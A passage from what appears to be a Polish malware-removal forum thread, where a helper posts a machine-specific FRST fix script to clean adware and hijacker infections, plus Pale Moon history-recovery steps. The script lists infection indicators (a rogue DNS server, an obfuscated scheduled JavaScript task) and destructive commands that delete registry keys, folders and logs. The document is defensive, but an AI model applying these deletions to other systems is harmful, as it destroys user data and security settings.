D:\Program Files\MSUser.Default\Help_3\CfHelp33.exe () D:\Program Files\MSUser.Default\Help_5\CfHelp55.exe () D:\Program Files\MSUser.Default\Help_6\CfHelp66.exe R2 CfHelper33; D:\Program Files\MSUser.Default\Help_3\CfHelp33.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CfHelper44; D:\Program Files\MSUser.Default\Help_4\CfHelp44.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CfHelper55; D:\Program Files\MSUser.Default\Help_5\CfHelp55.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] R2 CfHelper66; D:\Program Files\MSUser.Default\Help_6\CfHelp66.exe [190980 2016-09-13] () [Brak podpisu cyfrowego] S2 Bokvunnu; "C:\Users\ppp\AppData\Roaming\GowvePitpagf\Lurzem.exe" -cms [X] S3 Trufos; C:\Windows\System32\DRIVERS\Trufos.sys [485512 2016-04-28] (BitDefender S.R.L.) U3 idsvc; Brak ImagePath U3 wpcsvc; Brak ImagePath HKLM\...\Run: [] => [X] HKLM-x32\...\Run: [SunJavaUpdateSched] => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" BootExecute: autocheck autochk * lsdel.exe Task: {0840D42C-D9F4-411D-AD2D-A4A49D5FC764} - System32\Tasks\{73CE7F1C-9663-4383-95E2-DC596BAFB3F0} => pcalua.exe -a "C:\Program Files\SpaceSoundPro\uninstaller.exe" -d "C:\Program Files\SpaceSoundPro" Task: {09FD1D52-B7D4-48BF-85BA-4703B093A1B4} - System32\Tasks\{D992B94A-F245-45D9-B4A6-8515E4BB4D32} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {0C070801-0FFC-474E-8731-6FA6E2C1AA02} - System32\Tasks\Microsoft\Microsoft Antimalware\MpIdleTask => c:\Program Files\Microsoft Security Client\MpCmdRun.exe Task: {1180967C-83F0-42E4-9D33-EE380E6D1BEC} - System32\Tasks\{DD34E517-FE22-4270-8B76-7421A8046BE9} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {1284B942-EF7A-449D-A959-394EF56A677F} - System32\Tasks\{A8E3F583-A5F8-4043-A670-EA449F8BDF4B} => pcalua.exe -a C:\Users\ppp\Downloads\winzip70.exe -d C:\Users\ppp\Downloads Task: {1E7E592F-4A6B-4AF9-AE4B-137C1BECCC1B} - System32\Tasks\{7C0234ED-CEA7-456F-8F75-B3F368D443FD} => C:\Program Files (x86)\McAfee Security Scan\2.0.181\McUICnt.exe Task: {257DF5B0-D9C5-4396-901D-27FB1BABA186} - System32\Tasks\{C7D6008F-8F4B-4AF5-9C1F-4E46A68D1F36} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {29EC172C-573C-4760-BD31-46E827F91142} - System32\Tasks\{D087238C-FE4E-4D0C-8B00-964EF1B21D54} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {330F7681-FECA-4FD4-A0C1-2AC0C58787BD} - System32\Tasks\{BB4B2144-599E-498B-8721-5967CC37BB55} => C:\Program Files (x86)\McAfee Security Scan\2.0.181\McUICnt.exe Task: {35DD5C3C-DB7D-4BA7-8FCF-56BBDBFD8894} - System32\Tasks\{4B581630-E9D5-4766-B061-FAF4784F72C7} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {374F331A-62EF-4A4E-8750-9336D00E9074} - System32\Tasks\{28CF082F-31E8-482A-A696-E4E9D917A93C} => C:\Program Files (x86)\McAfee Security Scan\2.0.181\McUICnt.exe Task: {4131A782-F5F0-403F-BAF3-F86AB1AC815A} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku <==== UWAGA Task: {52297301-2EDA-4067-B884-3D5CAF8ACF69} - System32\Tasks\{169916F2-D659-4C57-9E8C-C832E62E0D48} => pcalua.exe -a "C:\Program Files (x86)\WinThruster\unins000.exe" -c /silent Task: {56738121-9D02-40AD-9433-111AED274F18} - \JetCleanLoginCheckUpdate -> Brak pliku <==== UWAGA Task: {57A3FE5A-1817-4A4C-BB2F-7B78945E9709} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> Brak pliku <==== UWAGA Task: {6B4EA07A-A6F6-43B5-9E95-AFE426B0321F} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> Brak pliku <==== UWAGA Task: {6DE3FD5F-DDE5-4D25-B81E-75F37F3E3043} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku <==== UWAGA Task: {6F0F0E8D-5C8F-4035-8EE1-12960F5CEA5B} - System32\Tasks\{4EECA964-E9D0-4A89-B545-523753BF48F1} => C:\Program Files (x86)\McAfee Security Scan\2.0.181\McUICnt.exe Task: {76B7E8F0-B632-4948-8C4A-FD54D65212AD} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> Brak pliku <==== UWAGA Task: {7ADA8F7C-EECF-4A88-941A-59F5A3430271} - System32\Tasks\{3D01F992-96DC-421D-A426-8B2F4A4F2D8F} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {826E8B00-7EDE-4008-A152-ED4C7383A2AF} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => c:\Program Files\Microsoft Security Client\MpCmdRun.exe Task: {82B97A24-BFB7-42E5-8352-A4DC3B0766DE} - System32\Tasks\DriverToolkit Autorun => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe Task: {8D89EE46-2506-4000-B068-467CDA601570} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe Task: {9E0477E8-F77D-42CE-B50F-2321BA8F05C7} - \JetBoost_AutoUpdate -> Brak pliku <==== UWAGA Task: {A0D4E02B-4F9E-48F0-9C77-9E0FE67C580F} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku <==== UWAGA Task: {A5312850-A077-432A-920F-9D1C215B83E0} - System32\Tasks\UnregisterNonABICompliantCodeRange => Wscript.exe C:\PROGRA~2\5bijtnvk\9c89o.js Task: {B18F9BB3-939A-4141-821C-2C3ABB06AA0B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku <==== UWAGA Task: {B584720C-6EA7-465E-9D55-23DDB13F9044} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku <==== UWAGA Task: {B7ACE271-D218-4B72-BFB0-7576B640468C} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku <==== UWAGA Task: {B7CB9C3C-E79C-4D7C-B019-F20CEA5BDA91} - System32\Tasks\{177E99E9-BDDD-4D4C-AC47-6C363D5B0CB9} => pcalua.exe -a C:\Users\ppp\Downloads\Microsoft\X16-57077_VKYKV-JC3KY-7TQWD-GY7XD-M9P3P.exe -d C:\Users\ppp\Downloads\Microsoft Task: {BDDD9145-ADBD-4836-B688-10F71811C4F7} - System32\Tasks\{B1EB1369-A2B0-4FC5-B2B3-3C034BFAA972} => pcalua.exe -a C:\Users\ppp\Downloads\iview428_setup.exe -d C:\Users\ppp\Downloads Task: {BE88B82F-9064-4E61-9D21-09B9E3167C07} - System32\Tasks\{94EB6F62-6F69-43CF-B730-8CD6EA69D1FC} => C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVH.EXE Task: {C1ACFB53-96D7-4B61-9072-0B60C33C30A2} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA Task: {C27999BA-9F11-4E55-9AF2-A273DFDED2D1} - System32\Tasks\CreateExplorerShellUnelevatedTask => /NOUACCHECK Task: {C9675215-9281-44CC-AEA7-60F182B23139} - System32\Tasks\{AE22F64B-1656-48E5-986C-E3EAF576B910} => pcalua.exe -a "C:\Users\ppp\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NEDV2JNV\X16-57077_VKYKV-JC3KY-7TQWD-GY7XD-M9P3P.exe" -d C:\Users\ppp\Desktop Task: {CA3DD899-25C8-419C-BF01-7EAD73BC1303} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku <==== UWAGA Task: {D3C0EE06-0E30-486F-89DA-04DB2E4AE303} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku <==== UWAGA Task: {DA43429A-891D-4146-B660-EA3793E311BA} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe Task: {DD02CE3D-6176-4FBA-8389-D4610C6B937F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku <==== UWAGA Task: {EA14EA26-3D0E-41CA-830B-A81BAAA9D018} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku <==== UWAGA Task: C:\WINDOWS\Tasks\DriverToolkit Autorun.job => C:\Program Files (x86)\DriverToolkit\DriverToolkit.exe Task: C:\WINDOWS\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA Tcpip\..\Interfaces\{1816BC77-1199-4658-B220-2BB868685EC0}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{23b262fb-96ae-4e9b-a8dd-6cb8d4bdf60f}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{58c9a3d2-cb91-11e5-97c4-806e6f6e6963}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{644e8e76-1747-4eba-bee4-b304d50ddad6}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{65C05BA0-D0B8-44D1-978A-8C91CDB03E3C}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{6692e45a-fbbf-4127-898f-2231948439b3}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{a2e2c930-5576-4a50-aa98-5244ccf219a4}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{a5d35310-ab6e-4cc5-8469-13e3a5583339}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{F04B9042-60FF-4BC8-989A-D38E0DCDFC85}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{f3a68278-c2b5-4c5e-957a-f8053e20148c}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{f7c6a974-1765-4082-876b-007a030edb24}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{fa46bd63-638d-4fe2-84cb-4f1919e5cf0e}: [NameServer] 104.197.191.4 Tcpip\..\Interfaces\{FC5425F4-F28A-44FE-A6CE-C5988BF41845}: [NameServer] 104.197.191.4 HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page = HKU\S-1-5-21-3792996942-1847973479-2767891591-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O6ALVpuKMYLBCXsPk5jTsNfMAgETq8fa-ptMR5GzIZ59XIZky7L8fjgC6y-mZffSlcilqjM92hY3LJxCV4Ve61OJ0WAJ6FZCKVNVq8QnRSAukIFsecQxbaSUWIRHH-_mn9tAXafAhYE42gWlk6qDd1lRFCCR7RldLdoatBr1U,&q={searchTerms} HKU\S-1-5-21-3792996942-1847973479-2767891591-1000\Software\Microsoft\Internet Explorer\Main,SearchAssistant = hxxp://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBP2DAqp-XHW6O6ALVpuKMYLBCXsPk5jTsNfMAgETq8fa-ptMR5GzIZ59XIZky7L8fjgC6y-mZffSlcilqjM92hY3LJxCV4Ve61OJ0WAJ6FZCKVNVq8QnRSAukIFsecQxbaSUWIRHH-_mn9tAXafAhYE42gWlk6qDd1lRFCCR7RldLdoatBr1U,&q={searchTerms} SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL = Toolbar: HKU\S-1-5-21-3792996942-1847973479-2767891591-1000 -> Brak nazwy - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - Brak pliku DeleteKey: HKCU\Software\Google DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run DeleteKey: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains DeleteKey: HKCU\Software\Mozilla\Firefox DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Microsoft\Microsoft Antimalware DeleteKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths DeleteKey: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Microsoft Antimalware DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center DeleteKey: HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes DeleteKey: HKU\S-1-5-21-3792996942-1847973479-2767891591-1005\Software\Microsoft\Internet Explorer\Main DeleteKey: HKU\S-1-5-21-3792996942-1847973479-2767891591-1005\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\ByteFence C:\Program Files\Plumbytes Software C:\Program Files\pclient C:\Program Files\SpaceSoundPro C:\Program Files (x86)\Chwuward C:\Program Files (x86)\DPower C:\Program Files (x86)\host C:\Program Files (x86)\Mozilla Firefox D:\Program Files\MSUser.Default C:\ProgramData\profile.xml C:\ProgramData\cosun C:\ProgramData\LuckyBrowse C:\ProgramData\Nimfind C:\ProgramData\Nimfinds C:\ProgramData\Thunder Network C:\Users\ppp\AppData\Local\app C:\Users\ppp\AppData\Local\Drfege C:\Users\ppp\AppData\Local\Tempfolder C:\Users\ppp\AppData\Local\tuto_monetize_220160909 C:\Users\ppp\AppData\Roaming\*.* C:\Users\ppp\AppData\Roaming\Corner Sunshine C:\Users\ppp\AppData\Roaming\GameLauncher C:\Users\ppp\AppData\Roaming\Geunfy C:\Users\ppp\AppData\Roaming\KuaiZip C:\Users\ppp\AppData\Roaming\Mozilla C:\Users\ppp\AppData\Roaming\Softlink C:\Users\ppp\AppData\Roaming\Solvusoft C:\Users\ppp\AppData\Roaming\UPUpdata C:\Users\ppp\Desktop\Stare dane programu Firefox C:\Users\Public\Thunder Network C:\WINDOWS\Joberphlusisp C:\WINDOWS\ehome C:\WINDOWS\system32\ijaj C:\WINDOWS\System32\Drivers\Trufos.sys C:\WINDOWS\System32\Tasks\Microsoft\Microsoft Antimalware C:\WINDOWS\System32\Tasks\Microsoft\Windows\Media Center C:\WINDOWS\SysWOW64\kz.exe CMD: netsh advfirewall reset CMD: ipconfig /flushdns EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 3. Zrób nowy log FRST z opcji Skanuj (Scan), z zaznaczonymi polami Addition i Shortcut. Dołącz też plik fixlog.txt. Operacje związane z odskiwaniem Historii Pale Moon: W systemie są następujące punkty Przywracania systemu: ==================== Punkty Przywracania systemu ========================= 01-09-2016 22:16:17 Windows Update 11-09-2016 17:38:10 Zaplanowany punkt kontrolny 14-09-2016 17:38:16 Windows Update Jest szansa na plik z 1 września, o ile punkt Przywracania zawiera folder Pale Moon. Czyli: 1. Uruchom ShadowExplorer. Z menu wybierz tę datę 01-09-2016 i w programie przejdź do ścieżki C:\Users\ppp\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\3umbc8e6.default, skopiuj plik places.sqlite na Pulpit właściwy. 2. Zamknij Pale Moon. W eksploratorze Windows (a nie ShadowExplorer) wklej w pasku adresów ścieżkę C:\Users\ppp\AppData\Roaming\Moonchild Productions\Pale Moon\Profiles\3umbc8e6.default i ENTER. Zamień w niej plik places.sqlite tym skopiowanym w punkcie 1 na Pulpit. Uruchom Pale Moon i podaj czy widzisz starsze dane o które Ci chodziło.

FRST potwierdza, że plik dnspapi.dll został wyleczony. Wszystko zrobione. Na koniec: Zastosuj DelFix, wyczyść foldery Przywracania systemu oraz zaktualizuj programy Adobe. Wszystko opisane tu: KLIK.

Wzystko zrobione. 1. Dodatkowa uwaga tycząca gry Black Desert - do deinstalacji towarzyszczący program QGNA (Global Gamers Solutions Ltd.). Wg Emsisoft oraz Reason Core Security to niepożądany element (podobnie jak THORN usuwany już wcześniej przeze mnie). Ale sugerowałabym pozbyć się po prostu także całej gry. 2. Ostatni skrypt do FRST. Otwórz Notatnik i wklej w nim: RemoveDirectory: C:\FRST\Quarantine RemoveDirectory: C:\KVRT_Data RemoveDirectory: C:\ProgramData\Info CMD: del /q C:\IFRToolLog.txt CMD: del /q C:\TDSSKiller.3.1.0.11_13.09.2016_20.03.50_log.txt Plik zapisz pod nazwą fixlist.txt w folderze z którego uruchamiasz FRST. Uruchom FRST i kliknij w Napraw (Fix). 3. Na wszelki wypadek zrób skan za pomocą Hitman Pro. Jeśli wykryje coś innego niż FRST64.exe (to fałszywy alarm), dostarcz raport.